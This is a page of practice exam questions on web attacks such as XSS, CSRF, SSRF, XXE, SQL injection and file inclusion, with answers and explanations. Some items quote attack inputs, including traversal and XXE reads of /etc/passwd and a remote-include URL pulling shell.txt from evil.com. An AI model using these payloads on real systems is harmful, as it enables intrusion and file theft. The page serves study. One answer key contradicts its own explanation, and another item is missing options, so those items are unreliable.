HTTP/1.1…","url":"https://courseiva.com/questions/ec-council/ec-ceh/an-analyst-reviews-a-web-server-log-and-sees-the-following-r-vknfi"},{"@type":"ListItem","position":150,"name":"An attacker attempts to exploit a web application by sending a request that triggers the server to make an internal HTTP…","url":"https://courseiva.com/questions/ec-council/ec-ceh/an-attacker-attempts-to-exploit-a-web-application-by-sending-ta4mf"}]}
CCNA Web Application and Injection Attacks Questions
75 of 156 questions · Page 2/3 · Web Application and Injection Attacks · Answers revealed
A security analyst notices that a web application returns different HTTP responses for valid and invalid usernames during login. Which attack is this behavior most likely facilitating?
A.Username enumeration
B.Cross-site scripting (XSS)
C.Directory traversal
D.SQL injection
AnswerA
Username enumeration occurs when a web application's login mechanism provides distinct responses or behaviors for valid versus invalid usernames. This difference, which could manifest as varying HTTP status codes, specific error messages (e.g., "Username exists" vs. "Invalid credentials"), or even subtle timing discrepancies, allows an attacker to systematically test usernames and identify which ones correspond to existing accounts. Once valid usernames are identified, they become targets for subsequent brute-force attacks or credential stuffing.
Why this answer
When a login endpoint returns distinguishable responses (different status codes, messages, or timing) for valid versus invalid usernames, an attacker can systematically probe the endpoint to build a list of valid accounts. This behavior is the defining characteristic of username enumeration. It is a reconnaissance technique that precedes brute-force or credential-stuffing attacks.
Exam trap
CEH often tests the confusion between username enumeration and brute force — enumeration identifies valid accounts via response differences, while brute force attempts to guess credentials; the question's focus on differing responses signals enumeration.
How to eliminate wrong answers
Option B is wrong because XSS involves injecting client-side scripts into pages viewed by other users, not observing differential login responses. Option C is wrong because directory traversal exploits insufficient path sanitization (e.g., ../../etc/passwd) to read files outside the web root, unrelated to login response differences. Option D is wrong because SQL injection manipulates backend database queries through unsanitized input, and while it can sometimes leak data, the described behavior of differing responses for valid/invalid usernames is specifically enumeration, not SQLi.
A security engineer is reviewing web server logs and finds the following request: GET /files/../../../etc/passwd HTTP/1.1. Which THREE attacks could be associated with this request? (Choose THREE.)
Select 3 answers
A.Directory traversal
B.File disclosure
C.SQL injection
D.Command injection
E.Local File Inclusion (LFI)
AnswersA, B, E
Directory traversal, also known as path traversal, is an attack that allows an attacker to access files and directories stored outside the web root directory. The `../` sequences in the request are a clear indicator, as they instruct the server to navigate up the directory hierarchy. By repeatedly using `../`, the attacker attempts to escape the restricted web directory and access sensitive system files like `/etc/passwd`.
Why this answer
The request uses path traversal to access /etc/passwd (directory traversal/LFI). It can be used for file disclosure, and if the file is included in a script, it could be LFI. Command injection is not related.
During a web application test, an analyst intercepts a request containing a 'Referer' header that points to a different domain. The analyst modifies the request by removing the 'Referer' header and the action still executes successfully. Which type of attack is the analyst testing?
A.Server-Side Request Forgery (SSRF)
B.Clickjacking
C.Cross-Site Request Forgery (CSRF)
D.Cross-Site Scripting (XSS)
AnswerC
Cross-Site Request Forgery (CSRF) exploits a user's authenticated session to force their browser to send an unwanted request to a vulnerable web application. A common defense against CSRF involves the server inspecting the HTTP Referer header to verify that the request originated from the application's own domain, preventing requests from external, malicious sites. An analyst successfully bypassing this Referer header check by manipulating or omitting it directly demonstrates a CSRF vulnerability, as the server's origin validation mechanism has been defeated.
Why this answer
CSRF protection often relies on checking the Referer header; if it can be removed or spoofed, the application is vulnerable to CSRF.
Which Burp Suite tool is specifically designed to automate customized attacks against web applications, such as brute-forcing login credentials or fuzzing parameters?
A.Repeater
B.Scanner
C.Intruder
D.Proxy
AnswerC
Burp Intruder is specifically engineered to automate custom, payload-driven attacks against web applications. Users define "payload positions" within a base request, then configure various payload sets and attack types (e.g., Sniper, Battering Ram, Pitchfork) to systematically inject values into those positions. This powerful tool is ideal for brute-forcing, fuzzing, credential stuffing, and other repetitive tasks requiring automated request modification and response analysis.
Why this answer
Burp Intruder is specifically designed to automate customized attacks against web applications, such as brute-forcing login credentials, fuzzing parameters, and enumerating identifiers. It allows testers to configure payloads, attack types, and grep-match rules to analyze responses. This makes it the correct tool for automating repetitive attacks.
Exam trap
CEH often tests the distinction between Burp Intruder (automation) and Scanner (automated vulnerability detection), causing candidates to confuse the two.
How to eliminate wrong answers
Option A is wrong because Repeater is used for manually manipulating and resending individual requests, not for automation. Option B is wrong because Scanner automates vulnerability discovery but does not perform customized brute-force or fuzzing attacks; it uses predefined checks. Option D is wrong because Proxy is an intercepting proxy for capturing and modifying traffic, not for automating attacks.
A penetration tester intercepts the following request using Burp Suite: POST /change_password HTTP/1.1 Host: example.com Cookie: sessionid=abc123; SameSite=Lax Content-Type: application/x-www-form-urlencoded new_password=Hacker123 The tester successfully crafts a CSRF attack by embedding a hidden form in a malicious page. Which mitigation is most likely missing?
A.SameSite=Strict
B.HTTPOnly flag
C.Secure flag
D.CSRF token
AnswerD
A CSRF token is a unique, unpredictable, and secret value generated by the server and included with every state-changing request, typically embedded in hidden form fields or request headers. The server validates this token upon receiving the request, ensuring it matches the token associated with the user's session. Since a malicious attacker operating from a different origin cannot obtain or guess this secret token, they cannot craft a valid forged request that the server would accept, thereby effectively preventing CSRF attacks.
Why this answer
The request shows a session cookie with SameSite=Lax but no anti-CSRF token, and the tester successfully forged a cross-site POST. A CSRF token is the standard defense that binds the request to the user's session and cannot be predicted by an attacker, so its absence is the missing mitigation.
Exam trap
The trap is picking SameSite=Strict as the fix when the scenario already shows Lax and a successful attack — candidates overlook that the token is the canonical CSRF control and that SameSite alone is insufficient.
How to eliminate wrong answers
Option A is wrong because SameSite=Strict would block the cookie on cross-site requests, but the attack succeeded with Lax — and Lax already blocks most cross-site POSTs, so the real gap is the missing token. Option B is wrong because HTTPOnly prevents JavaScript from reading the cookie, which mitigates XSS-based theft, not CSRF. Option C is wrong because the Secure flag only ensures the cookie is sent over HTTPS, which does not prevent CSRF.
A security analyst identifies that a web application is vulnerable to Server-Side Request Forgery (SSRF). Which TWO of the following are effective mitigation techniques for SSRF?
D.Implement an allowlist of permitted URLs or IP addresses
E.Encode user input in base64 before passing to URL functions
AnswersA, D
Disabling unnecessary URL schemas, such as `file://`, `dict://`, `gopher://`, or `ftp://`, is a crucial mitigation for Server-Side Request Forgery (SSRF). By restricting the protocols the server can use to make outbound requests, the attack surface is significantly reduced. This prevents attackers from leveraging the vulnerability to access local files, perform port scanning, or interact with internal services using non-HTTP protocols, thereby blocking common exploitation vectors.
Why this answer
Option A is correct because restricting or disabling dangerous URL schemas such as file://, dict://, gopher://, and ftp:// prevents an attacker from abusing the server's URL-fetching functionality to read local files or interact with non-HTTP services, which is a core SSRF exploitation vector. Option D is correct because an allowlist (positive validation) of permitted domains, URLs, or IP addresses ensures the application only makes requests to explicitly trusted destinations, which is the most robust defense against SSRF since it rejects all unapproved targets by default. Option B is not ideal because blacklisting private IP ranges is easily bypassed using techniques such as decimal/octal/hex IP encoding, DNS rebinding, IPv6-mapped addresses, or redirects, so it is considered a weak mitigation rather than an effective one.
Option C is incorrect because increasing HTTP request timeouts only affects how long the server waits for a response and does nothing to prevent SSRF requests from being made. Option E is incorrect because base64-encoding user input does not validate or restrict the destination; the server would still decode and process the URL, so the SSRF vulnerability remains exploitable.
Exam trap
CEH often tests the misconception that blacklisting private IPs is sufficient, but allowlisting and schema restrictions are more robust mitigations.
Which of the following describes the difference between reflected and stored (persistent) cross-site scripting (XSS)?
A.Reflected XSS is a server-side vulnerability, while stored XSS is a client-side vulnerability
B.Reflected XSS is non-persistent and requires user interaction, while stored XSS is persistent and can affect multiple users
C.Reflected XSS only works with HTTP POST requests, while stored XSS works with GET requests
D.Reflected XSS is triggered by the server, while stored XSS is triggered by the client
AnswerB
This statement accurately describes the core differences. Reflected XSS is non-persistent because the malicious payload is delivered via a crafted URL or form submission and is immediately reflected in the server's response, requiring the victim to click a specific link. In contrast, Stored XSS is persistent; the malicious script is permanently saved on the target server (e.g., in a database) and is then served to any user who accesses the vulnerable web page, affecting multiple users without individual interaction beyond visiting the compromised page.
Why this answer
Reflected XSS is non-persistent: the malicious script is embedded in a request (often a URL parameter) and immediately reflected back in the response, requiring the victim to click a crafted link. Stored XSS is persistent: the payload is saved on the server (e.g., in a database, comment field, or forum post) and served to every user who views the affected page, affecting multiple victims without individual interaction.
Exam trap
CEH often tests the persistence and interaction distinction between reflected (non-persistent, needs a click) and stored (persistent, affects many users) XSS, while planting false distinctions about server-side vs client-side or GET vs POST to mislead candidates.
How to eliminate wrong answers
Option A is wrong because both reflected and stored XSS are fundamentally server-side output-encoding vulnerabilities — the server fails to sanitize/encode user input before rendering it; neither is a 'client-side vulnerability' in the sense implied. Option C is wrong because reflected XSS commonly works via GET (URL parameters) though it can also occur via POST, and stored XSS is independent of HTTP method — the method is not the distinguishing factor. Option D is wrong because both types are triggered when the victim's browser executes the injected script; the server reflects or stores the payload but the execution is client-side in both cases, so this distinction is false.
A web application uses XML to transfer data. An attacker submits the following payload: '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'. What vulnerability is being exploited?
A.XML External Entity (XXE) injection
B.Directory traversal
C.Server-Side Request Forgery (SSRF)
D.Command injection
AnswerA
XML External Entity (XXE) injection occurs when an XML parser processes a DOCTYPE declaration that defines an external entity, allowing the attacker to include content from external URIs or local files into the XML document. By defining an entity that points to a file path like `/etc/passwd`, the server's XML parser will attempt to resolve and embed the file's content within the XML response or process it internally. This vulnerability leverages the server's ability to fetch resources specified within the DTD, leading to information disclosure or even server-side request forgery.
Why this answer
The payload defines an external entity (xxe) that references the local file /etc/passwd and then uses it within the XML document. This is a classic XML External Entity (XXE) injection attack, where the attacker exploits weakly configured XML parsers to read local files or perform SSRF. The presence of <!DOCTYPE> with an ENTITY declaration and its usage in the root element confirms XXE.
Exam trap
CEH often tests the confusion between XXE and SSRF, as XXE can lead to SSRF, but the payload clearly shows an external entity definition, making XXE the primary vulnerability.
How to eliminate wrong answers
Option B is wrong because directory traversal typically involves manipulating file paths with ../ sequences to access files outside the web root, not XML entity definitions. Option C is wrong because SSRF involves making the server send requests to internal or external resources, which can be a consequence of XXE but is not the primary vulnerability shown here. Option D is wrong because command injection involves executing arbitrary OS commands, often through shell metacharacters, not through XML entity expansion.
A security analyst observes that after a user submits a comment on a blog, the comment is displayed immediately on the page without sanitization. Another user visits the page and the comment's JavaScript executes in their browser. Which type of XSS attack is this?
A.DOM-based XSS
B.Reflected XSS
C.Self-XSS
D.Stored XSS
AnswerD
Stored Cross-Site Scripting (XSS), also known as Persistent XSS, occurs when a malicious script is permanently saved on the target server, typically within a database, message board, or comment section. When any user subsequently accesses the affected web page, the server retrieves and delivers the stored malicious payload along with the legitimate content. This script then executes automatically in the victim's browser, impacting all users who view the compromised data without requiring any specific interaction from them beyond page access.
Why this answer
The comment is stored on the server and executed when other users view the page, which is the definition of stored (persistent) XSS.
A penetration tester uses SQLMap with the following command: sqlmap -u 'http://target.com/page.php?id=1' --batch --dbs. Which database enumeration technique is SQLMap using by default?
A.Out-of-band SQL injection
B.Blind SQL injection
C.Time-based SQL injection
D.In-band SQL injection
AnswerD
In-band SQL injection is SQLMap's default and preferred method because it allows the attacker to retrieve data directly through the same communication channel used for the original query. This category includes UNION-based attacks, which append a malicious SELECT statement to the original query to return additional data, and error-based attacks, which force the database to return error messages containing query results. These methods are generally the fastest and most efficient for data extraction when applicable, providing immediate feedback.
Why this answer
SQLMap's default enumeration technique is in-band (union/error-based) SQL injection, which extracts data through the same channel as the request — typically via UNION SELECT or error messages reflected in the HTTP response. With --dbs and no technique flag, SQLMap first attempts in-band methods before falling back to blind or time-based if those fail.
Exam trap
The trap is assuming SQLMap defaults to blind or time-based injection because those are 'safer' — in reality SQLMap prefers in-band (union/error) extraction and only falls back when necessary.
How to eliminate wrong answers
Option A is wrong because out-of-band SQL injection requires a separate channel (DNS or HTTP exfiltration to an attacker-controlled host) and must be explicitly enabled with --dns-domain or similar flags — it is never the default. Option B is wrong because blind SQL injection (boolean-based) is a fallback technique SQLMap uses only when in-band extraction is not possible, not the default. Option C is wrong because time-based SQL injection relies on deliberate delays (e.g., WAITFOR DELAY, SLEEP) and is also a fallback, not the default technique.
Which of the following is the primary purpose of using a CSRF token in a web application?
A.Prevent cross-site request forgery
B.Prevent session hijacking
C.Prevent XSS
D.Prevent SQL injection
AnswerA
Cross-Site Request Forgery (CSRF) attacks trick authenticated users into submitting unintended requests to a web application, leveraging their existing session. CSRF tokens are unique, unpredictable, and secret values generated by the server and embedded within forms or request headers. Upon submission, the server validates the token, ensuring the request originated from the legitimate application and user, thereby preventing an attacker's forged request from being processed.
Why this answer
CSRF tokens are unique, unpredictable values embedded in forms or requests that validate the request originated from the legitimate application, preventing cross-site request forgery attacks.
An organization wants to prevent directory listing on its Apache web server. Which of the following configuration changes would achieve this?
A.Set 'AllowOverride None'
B.Set 'ServerSignature Off'
C.Set 'Options -Indexes' in the httpd.conf or .htaccess file
D.Set 'DirectoryIndex disabled'
AnswerC
The 'Options -Indexes' directive explicitly disables the automatic generation of directory listings when a default index file (such as index.html or index.php) is not found within a directory. By removing the 'Indexes' option, the web server is configured to return a '403 Forbidden' error instead of displaying the contents of the directory to the client. This is the direct and intended method for preventing directory browsing in Apache, effectively mitigating information disclosure risks.
Why this answer
Disabling the Indexes option in the Directory directive prevents Apache from listing directory contents when no index file exists.
An attacker exploits a vulnerable parameter in a web application by submitting the following payload: http://target.com/page.php?file=http://evil.com/shell.txt. The server returns the contents of the remote file. This is an example of which type of attack?
A.Directory traversal
B.Local File Inclusion (LFI)
C.Command injection
D.Remote File Inclusion (RFI)
AnswerD
Remote File Inclusion (RFI) vulnerabilities allow an attacker to force the web application to include and execute or display a file hosted on a remote server, typically controlled by the attacker. This is achieved by injecting a full URL into a vulnerable parameter that the application uses to dynamically include files. The payload's explicit use of a remote URL is the defining characteristic of an RFI attack, enabling the server to fetch and process content from an external source.
Why this answer
The payload includes a URL to a remote file (http://evil.com/shell.txt) that the server fetches and executes or returns. This is characteristic of Remote File Inclusion (RFI), where an attacker includes a file from an external server. The server returning the contents indicates the remote file was included.
Exam trap
CEH often tests the distinction between LFI and RFI; candidates may confuse the two, but the presence of a remote URL in the payload clearly indicates RFI.
How to eliminate wrong answers
Option A is wrong because directory traversal (e.g., ../../etc/passwd) accesses local files outside the web root, not remote files. Option B is wrong because LFI includes local files on the same server, not remote ones. Option C is wrong because command injection executes OS commands, not file inclusion.
Which THREE of the following are types of SQL injection attacks? (Choose 3)
Select 3 answers
A.Out-of-band SQLi (e.g., DNS or HTTP exfiltration)
B.Stored SQLi
C.In-band SQLi (error-based or union-based)
D.Blind (inferential) SQLi (boolean- or time-based)
E.Reflected SQLi
AnswersA, C, D
Out-of-band SQLi exfiltrates data through a separate channel such as DNS or HTTP requests, used when in-band and inferential techniques are blocked. It is a recognised SQL injection category, satisfying the question's requirement for attack types.
Why this answer
Option A is correct because out-of-band SQLi is a recognized SQL injection category in which the attacker uses a separate channel such as DNS or HTTP requests to exfiltrate data when the database server cannot return results directly through the application response. Option C is correct because in-band SQLi is the classic SQL injection type where results are returned in the same communication channel, typically via error-based or UNION-based techniques that leverage database error messages or UNION SELECT statements. Option D is correct because blind (inferential) SQLi is a standard SQL injection category where no data is directly returned; instead, attackers infer information using boolean-based true/false responses or time-based delays such as WAITFOR DELAY or SLEEP.
Option B is not a recognized SQLi type; 'stored' describes stored XSS, not SQL injection, even though stored procedures can be involved in SQLi. Option E is also not a SQLi category; 'reflected' describes reflected XSS, where malicious script is echoed back by the application rather than injected into SQL queries.
Exam trap
EC-Council often tests candidates by mixing SQL injection categories with XSS terminology (stored/reflected) to see if they confuse web attack types; the trap here is that 'stored' and 'reflected' are not SQLi types but XSS variants.
Which TWO of the following are characteristics of stored (persistent) XSS?
Select 2 answers
A.The attack requires the victim to click a crafted link
B.The payload is reflected immediately in the response
C.The malicious script is stored on the server (e.g., in a database)
D.The attack only works if the victim is logged in
E.The attack can affect multiple users without direct interaction
AnswersC, E
A defining characteristic of Stored XSS, also known as Persistent XSS, is that the attacker's malicious script is successfully injected into and saved within the web application's backend infrastructure, such as a database, comment section, or user profile. This persistence means the payload remains on the server, ready to be delivered to any user who later requests the affected content, making it a highly potent and widespread threat.
Why this answer
Stored XSS involves malicious script being permanently stored on the server (e.g., in a database) and executed whenever the stored content is accessed. It does not require a crafted link, and it can affect multiple users without direct interaction.
A security team discovers that their web application is vulnerable to a Server-Side Request Forgery (SSRF) attack. Which of the following is the MOST effective mitigation technique to prevent SSRF?
A.Implement a whitelist of allowed domains and IP addresses for outbound requests
B.Use input validation to block URLs containing '127.0.0.1' or 'localhost'
C.Implement CSRF tokens on all forms
D.Disable unnecessary HTTP methods on the web server
AnswerA
Implementing a whitelist of allowed domains and IP addresses for outbound requests is the most effective defense against Server-Side Request Forgery (SSRF). This robust control ensures the server can only initiate connections to explicitly permitted external resources or internal services. By strictly restricting outbound connections to a predefined, trusted list, any attempt by an attacker to force the server to connect to unauthorized internal systems or arbitrary external hosts will be blocked, directly mitigating the SSRF vulnerability.
Why this answer
Whitelisting allowed domains and IP addresses is the most effective SSRF mitigation because it restricts the server from making requests to arbitrary external or internal resources.
An attacker sends a request to a web server with the following header: X-Forwarded-For: 127.0.0.1. The server processes the request as if it came from localhost and grants administrative access. This is an example of:
A.HTTP request smuggling
B.IDOR (Insecure Direct Object Reference)
C.Clickjacking
D.Server-Side Request Forgery (SSRF)
AnswerD
Correct. SSRF occurs when the server is tricked into making internal requests based on user-controlled input, such as the X-Forwarded-For header, which can lead to access to internal resources or administrative interfaces.
Why this answer
The scenario describes spoofing the X-Forwarded-For header to bypass IP-based access controls. This is not SSRF; SSRF involves the server making outbound requests to internal resources based on user input. None of the listed options correctly identifies this attack.
Which of the following is a primary defense against SQL injection attacks?
A.Prepared statements
B.HTTPS encryption
C.Input blacklisting
D.Output encoding
AnswerA
Prepared statements, also known as parameterized queries, are a primary defense against SQL injection because they fundamentally separate the SQL code logic from user-supplied data. The database engine pre-compiles the query structure, treating all subsequent input as literal data values rather than executable SQL commands. This mechanism ensures that malicious characters within user input cannot alter the intended query structure, effectively preventing injection attacks by ensuring input is never interpreted as code.
Why this answer
Prepared statements with parameterized queries ensure user input is treated as data, not executable SQL code.
Which THREE of the following are common indicators of an SQL injection attack? (Choose 3.)
Select 3 answers
A.Frequent 302 redirects to login pages
B.Multiple failed connection attempts in server logs
C.Unexpected rows or columns in query results
D.Unusually slow database responses
E.Database error messages in the application response
AnswersC, D, E
The presence of unexpected rows or columns in an application's query results is a strong indicator of a successful UNION-based SQL injection. Attackers leverage the `UNION` operator to combine the results of their malicious query with the legitimate query, thereby extracting data from other tables or databases that were not intended for display. This manipulation directly alters the structure and content of the returned dataset, making it a clear sign of data exfiltration or unauthorized data retrieval.
Why this answer
SQL injection attacks commonly cause unexpected rows or columns in query results due to manipulated queries, unusually slow database responses from resource-intensive operations like UNION or subqueries, and database error messages that reveal syntax or structure to the attacker. Frequent 302 redirects and many failed connection attempts are not typical or specific indicators of SQL injection.
A penetration tester needs to perform a brute-force attack on a web application login form. Which Burp Suite tool is specifically designed for automating parameterized attacks like password guessing?
A.Repeater
B.Scanner
C.Intruder
D.Proxy
AnswerC
Intruder is purpose-built for automating parameterized attacks by systematically injecting various payloads into specified insertion points within an HTTP request. It enables sophisticated brute-force, dictionary, and credential stuffing attacks by iterating through user-defined lists or generated sequences of values. This module offers multiple attack types, such as Sniper or Battering Ram, to efficiently test a wide range of input fields for vulnerabilities or weak credentials.
Why this answer
Burp Suite Intruder is specifically designed for automating parameterized attacks, such as brute-forcing login credentials, by allowing the tester to define payload positions and iterate through a list of values (e.g., passwords) against a target endpoint. Unlike other tools in Burp Suite, Intruder supports multiple attack types (Sniper, Battering Ram, Pitchfork, Cluster Bomb) and can handle rate limiting and session handling, making it ideal for password guessing.
Exam trap
EC-Council often tests the misconception that Repeater can be used for brute-forcing because it can resend requests, but Repeater lacks the automated payload iteration and response analysis features that Intruder provides.
How to eliminate wrong answers
Option A is wrong because Repeater is used for manually resending and modifying individual HTTP requests to observe responses, not for automating multiple iterations of parameterized attacks. Option B is wrong because Scanner is designed for automated vulnerability detection (e.g., SQL injection, XSS) and does not support custom payload lists or brute-force sequencing. Option D is wrong because Proxy is an intercepting proxy that captures and forwards traffic between the browser and target, but it lacks the automation and payload iteration capabilities required for brute-force attacks.
A security engineer observes that an internal web application uses XML to transmit data between systems. The engineer discovers that by sending a crafted XML payload, they can read sensitive files from the server's filesystem. Which attack is being performed?
A.SSRF
B.Command injection
C.XXE injection
D.XPath injection
AnswerC
XXE injection occurs when an XML parser processes XML input containing references to external entities, which are then resolved by the server without proper validation. Attackers can define malicious external entities within the Document Type Definition (DTD) to exploit this, often using the "file://" protocol to read local files from the server's filesystem, such as configuration files or sensitive credentials. This direct file disclosure via XML entity processing perfectly matches the described observation.
Why this answer
XXE (XML External Entity) injection allows reading files via external entities in XML.
A web application allows users to view documents by specifying a filename in the URL, e.g., /getDocument?file=report.pdf. A tester changes the file parameter to '../../etc/passwd' and retrieves the system password file. Which vulnerability is being exploited?
A.Local File Inclusion (LFI)
B.Directory traversal
C.Remote File Inclusion (RFI)
D.Command injection
AnswerB
Directory traversal, also known as path traversal, is a vulnerability that permits an attacker to read arbitrary files on the server's file system by manipulating file paths in user-supplied input. This exploit uses sequences like "../" (dot-dot-slash) to navigate outside the intended directory, bypassing security controls that fail to properly validate or sanitize file names or paths. The ability to "view documents by specifying" a path directly aligns with this vulnerability, as it focuses on accessing files located anywhere on the server.
Why this answer
The tester manipulated the 'file' parameter with '../' sequences to escape the intended directory and read /etc/passwd, which is classic directory traversal (path traversal). The vulnerability arises because the application fails to sanitize user-supplied file paths, allowing access to files outside the web root.
Exam trap
CEH often tests the confusion between directory traversal (reading arbitrary files via path manipulation) and LFI (including local files for execution), causing candidates to pick LFI when the scenario only shows file disclosure.
How to eliminate wrong answers
Option A is wrong because LFI refers to including a local file for execution within the application (e.g., via include() in PHP), which can lead to code execution; here the file is simply read and returned, which is traversal. Option C is wrong because RFI involves including a remote file from an attacker-controlled server (e.g., http://evil.com/shell.txt), which is not what happened. Option D is wrong because command injection involves injecting OS commands into a shell call (e.g., '; cat /etc/passwd'), not manipulating a file path parameter.
A web application tester encounters a parameter that is reflected in the response without sanitization. The tester suspects XSS. Which TWO types of XSS could be present in this scenario? (Choose TWO.)
Select 2 answers
A.DOM-based XSS
B.Reflected XSS
C.Self-XSS
D.Stored (persistent) XSS
E.Blind XSS
AnswersA, B
This vulnerability occurs entirely on the client-side when a web application's JavaScript code processes user-controllable data, often from the URL fragment (#) or query string (?), and writes it unsafely into the Document Object Model (DOM). If the client-side script dynamically generates HTML or JavaScript using this unvalidated input, an attacker can inject malicious code that executes within the victim's browser. The "reflection" happens within the browser's DOM, not necessarily on the server's response.
Why this answer
Reflected XSS occurs when the input is immediately reflected in the response. DOM-based XSS occurs when client-side JavaScript processes the input unsafely. Stored XSS requires data to be saved on the server, which is not indicated here.
A security analyst notices that a web application returns different error messages for valid and invalid usernames during login. Which type of attack is this application MOST vulnerable to?
A.Directory traversal
B.Username enumeration
C.SQL injection
D.Cross-site scripting (XSS)
AnswerB
Username enumeration occurs when a web application's login mechanism provides distinct error messages or response times for valid usernames compared to invalid ones, even if the password is incorrect. For instance, "Invalid password for user 'admin'" versus "User 'admin' does not exist." This differential feedback allows an attacker to systematically test common usernames and compile a list of valid accounts, significantly aiding in subsequent brute-force or credential stuffing attacks.
Why this answer
The different error messages allow an attacker to enumerate valid usernames, which is a common precursor to brute-force or credential-stuffing attacks.
A penetration tester is testing an IIS web server and wants to exploit a WebDAV misconfiguration to upload a web shell. Which HTTP method should the tester check to determine if WebDAV is enabled and allows file uploads?
A.OPTIONS
B.MOVE
C.PUT
D.PROPFIND
AnswerA
The HTTP OPTIONS method is specifically designed to query a web server or resource about the communication options supported by the server for that particular URL. It provides a list of allowed HTTP methods (e.g., GET, HEAD, POST, PUT, DELETE, TRACE, CONNECT) in the 'Allow' header of its response. This is crucial for a penetration tester to discover if potentially vulnerable methods like PUT (for file upload) or WebDAV methods are enabled before attempting to exploit them.
Why this answer
The OPTIONS method is used to query the server about which HTTP methods are supported for a given resource. When WebDAV is enabled, the server's response to an OPTIONS request will include WebDAV-specific methods such as PUT, PROPFIND, MOVE, COPY, etc. This allows a penetration tester to quickly determine if WebDAV is enabled and if file uploads (via PUT) are allowed.
Therefore, OPTIONS is the correct method to check for WebDAV misconfiguration.
Exam trap
CEH often tests the misconception that PUT or PROPFIND directly indicates WebDAV is enabled, but the correct method to enumerate allowed methods is OPTIONS.
How to eliminate wrong answers
Option B (MOVE) is wrong because MOVE is a WebDAV method used to move a resource from one URI to another; it does not reveal whether WebDAV is enabled, and attempting it without prior knowledge may fail or not provide a complete list of allowed methods. Option C (PUT) is wrong because PUT is used to upload a file, but it does not indicate whether WebDAV is enabled; a server might allow PUT for other reasons (e.g., REST APIs), and a failed PUT does not confirm WebDAV is disabled. Option D (PROPFIND) is wrong because PROPFIND is a WebDAV method used to retrieve properties of a resource; while it can confirm WebDAV is enabled if it succeeds, it does not directly reveal whether file uploads are allowed, and it may require authentication or specific conditions.
During a web application assessment, a tester intercepts a request and modifies the 'Referer' header. The application then performs a state-changing action without requiring a token. Which vulnerability is most likely present?
A.Cross-site scripting (XSS)
B.Server-side request forgery (SSRF)
C.Cross-site request forgery (CSRF)
D.Clickjacking
AnswerC
Cross-site request forgery (CSRF) exploits the trust a web application has in an authenticated user's browser. An attacker crafts a malicious web page or email that, when visited or opened by an authenticated user, forces their browser to send an unintended request to the vulnerable application. The application, failing to verify the request's true origin or intent, processes the forged request, often relying on session cookies. Manipulating or bypassing checks on the Referer header can be a technique used in CSRF attacks, as applications sometimes use it as a weak defense to ensure requests originate from the expected domain.
Why this answer
The scenario describes a state-changing action performed without a token, and the tester modifies the Referer header. This is characteristic of CSRF, where an attacker tricks a victim's browser into sending a forged request. The lack of a token and reliance on the Referer header for validation are common CSRF weaknesses.
Exam trap
CEH often tests the confusion between CSRF and XSS; candidates may pick XSS because it involves client-side attacks, but CSRF specifically targets state-changing actions without tokens.
How to eliminate wrong answers
Option A is wrong because XSS involves injecting scripts into web pages, not modifying headers to perform state-changing actions. Option B is wrong because SSRF involves the server making requests to internal resources, not the client's browser. Option D is wrong because clickjacking involves overlaying invisible frames to trick users into clicking, not header manipulation.
A web application tester uses the following Burp Suite feature to automatically send multiple requests with different payloads to test for common vulnerabilities. Which feature is being used?
A.Intruder
B.Repeater
C.Proxy
D.Scanner
AnswerA
Intruder is the dedicated Burp Suite tool for automating customized attacks against web applications by systematically sending multiple requests with variable payloads. It allows testers to define specific insertion points within a request and iterate through a list of payloads, making it ideal for brute-forcing credentials, fuzzing input fields, and identifying injection vulnerabilities like SQLi or XSS with high precision and control over attack types.
Why this answer
Burp Intruder is designed to automate sending large numbers of requests with varying payloads, making it the tool for fuzzing, brute force, and injection testing. It lets testers define payload positions and payload sets, then iterates through them automatically. This matches the scenario of sending multiple requests with different payloads to test for vulnerabilities.
Exam trap
The trap is confusing Intruder with Scanner—both automate requests, but Intruder requires the tester to define payloads and positions, whereas Scanner uses built-in checks without user-supplied payloads.
How to eliminate wrong answers
Option B is wrong because Repeater is for manually editing and resending a single request repeatedly, not for automated bulk payload iteration. Option C is wrong because Proxy is for intercepting and inspecting traffic between the browser and server, not for automated payload testing. Option D is wrong because Scanner performs automated vulnerability scanning based on its own logic, but the question describes the tester supplying payloads—the defining feature of Intruder.
A penetration tester discovers that a web application's search functionality reflects user input directly in the page source without sanitization. The tester crafts a URL like http://example.com/search?q=<script>alert('XSS')</script> and the script executes. This is an example of which type of XSS?
A.Stored (persistent) XSS
B.Blind XSS
C.DOM-based XSS
D.Reflected XSS
AnswerD
Reflected XSS occurs when a malicious script, supplied in an HTTP request, is immediately and unsafely echoed back in the server's HTTP response. The server takes user-supplied input, often from a URL parameter, and directly embeds it into the HTML page without adequate sanitization or encoding. This causes the victim's browser to execute the script upon receiving the crafted response, making it a non-persistent, single-request attack.
Why this answer
Reflected XSS occurs when user-supplied input is immediately echoed back in the server's HTTP response without sanitization or encoding, and the browser executes it in the context of the victim's session. Here the payload in the q parameter is reflected in the page source and executes, which is the textbook definition of reflected (non-persistent) XSS. The attack requires the victim to click a crafted link, distinguishing it from stored XSS.
Exam trap
The trap is distinguishing reflected from DOM-based XSS: candidates see 'script executes in the browser' and pick DOM-based, but the key differentiator is whether the server reflected the payload in its response (reflected) or the client-side JS processed it (DOM-based).
How to eliminate wrong answers
Option A is wrong because stored (persistent) XSS requires the payload to be saved server-side (e.g., in a database or comment field) and served to other users later — here the input is only reflected in the immediate response. Option B is wrong because blind XSS is a variant of stored XSS where the payload fires in a backend/admin panel the attacker cannot see; it still requires persistence, which is absent here. Option C is wrong because DOM-based XSS executes entirely client-side when JavaScript sinks (e.g., innerHTML, document.write) process untrusted data from sources like location.hash — the server never reflects the payload in its response, which contradicts the scenario.
Which of the following tools is specifically designed to automate the detection and exploitation of SQL injection vulnerabilities in web applications?
A.Burp Suite
B.Nikto
C.Metasploit
D.SQLMap
AnswerD
SQLMap is an open-source penetration testing tool specifically engineered to automate the process of detecting and exploiting SQL injection flaws in web applications. It supports a wide array of SQL injection techniques, including boolean-based blind, error-based, union query, stacked queries, and time-based blind, across various database management systems. Its specialized algorithms and extensive payload database make it highly efficient and effective for fully automating the identification and exploitation of SQL injection vulnerabilities.
Why this answer
SQLMap is an open-source penetration testing tool specifically designed to automate the detection and exploitation of SQL injection flaws in web applications. It supports a wide range of database backends, injection techniques (boolean-based, time-based, error-based, UNION, stacked queries), and post-exploitation actions such as dumping database contents. This makes it the correct answer for automated SQLi detection and exploitation.
Exam trap
CEH often tests the distinction between general web scanners (Burp, Nikto) and the purpose-built SQLi automation tool (SQLMap), so candidates must match the tool to the specific vulnerability class.
How to eliminate wrong answers
